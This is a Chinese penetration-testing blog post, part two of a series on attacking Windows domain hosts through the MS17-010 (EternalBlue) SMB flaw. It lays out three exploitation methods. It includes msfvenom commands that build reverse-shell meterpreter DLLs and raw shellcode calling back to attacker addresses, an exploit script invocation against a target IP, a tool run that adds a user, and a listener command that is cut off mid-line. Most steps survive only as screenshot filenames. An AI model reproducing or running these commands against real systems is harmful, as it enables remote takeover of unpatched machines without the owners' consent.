域渗透|浅谈MS17010多种打法(二)

简介: 域渗透|浅谈MS17010多种打法

利用一

NSA原版MS17-010

记得metasploit开启监听

#metasploit生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll    
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll

1.检查MS17010

990b07a18396d585be094c0bebfb5b5f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.攻击

def2e475246fb402334724733f706d7e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

a5836f36f9decd3c54723d1c90919da1_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.漏洞利用

faacdaf57a2ead610bde1fe232cad028_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

39b187f7c6ab17932324e41067dd3183_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

metasploit上线

293ca8804b26a13e5d8aff4d856d4f22_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用二

K8哥哥的ksmb.exe

3c42502362b7feaa5d5302acbd607e4b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功添加用户

b4608ca303289d817dd958d0b5b33c44_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用三

https://blackwolfsec.cc/2017/05/12/Eternalblue_ms17-010/

需要多次利用才能成功

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode
#利用
python3 ms17-010.py --host 192.168.0.28 --file shellcode

加上--port 445会报错

1.攻击

5c891fa3db586c34089571e959a65309_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.监听后成功上线

#一键启动监听
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/revers

c2087f8d4f68c799502541f553dda370_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

相关文章
|
网络协议 网络安全 CDN
「红队建设」Domain Fronting隐藏C2服务器技术
「红队建设」Domain Fronting隐藏C2服务器技术
|
数据采集 人工智能 安全
数据安全代表厂商 防勒索+防爬虫领域代表厂商!瑞数信息连续入选国际权威机构报告
近日,全球领先的IT市场研究和咨询公司IDC连续发布了《中国数据安全市场发展趋势,2023》与《中国热点威胁安全检测与防护解决方案,2023》两本报告。
|
安全 网络安全 Windows
域渗透|浅谈MS17010多种打法(一)
域渗透|浅谈MS17010多种打法
574 0
域渗透|浅谈MS17010多种打法(一)
|
人工智能 运维 安全
|
网络协议 大数据 5G
大连接时代到来的十大标志之一:用户、战略与网络基础建设
根据中国互络信息中心近日发布的《中国互联网络发展状况统计报告》显示,截至2016年12月,我国网民规模达7.31亿,2016年共计新增网民4299万人,互联网普及率达到53.2%。在这组数据中,手机网民占比达6.95亿,因为老人与儿童可能不会操作PC,但用手机和平板上网则相对容易。
178 0
大连接时代到来的十大标志之一:用户、战略与网络基础建设
如何把每天的互联网信息变成“市场情报”?|也许这里有答案
产品原理摘要:最快2分钟感知数据;海量源站抓取+语义识别+情感趋势分析+传播路径+受众画像=透视趋势。   今年四月份,阿里云ET(ET的前身是阿里云小Ai)预测《我是歌手》决赛名次,在比赛的3个小时里实时分析了几百万条微博内容,这帮助ET成功预测了粉丝投票排序,
10611 0
|
Web App开发 安全
【CS论坛】网络空间威胁:理想与现实的差距
本文讲的是【CS论坛】网络空间威胁:理想与现实的差距,安全高管人员的观念与网络空间安全的现实差距,正在不断的扩大。
1114 0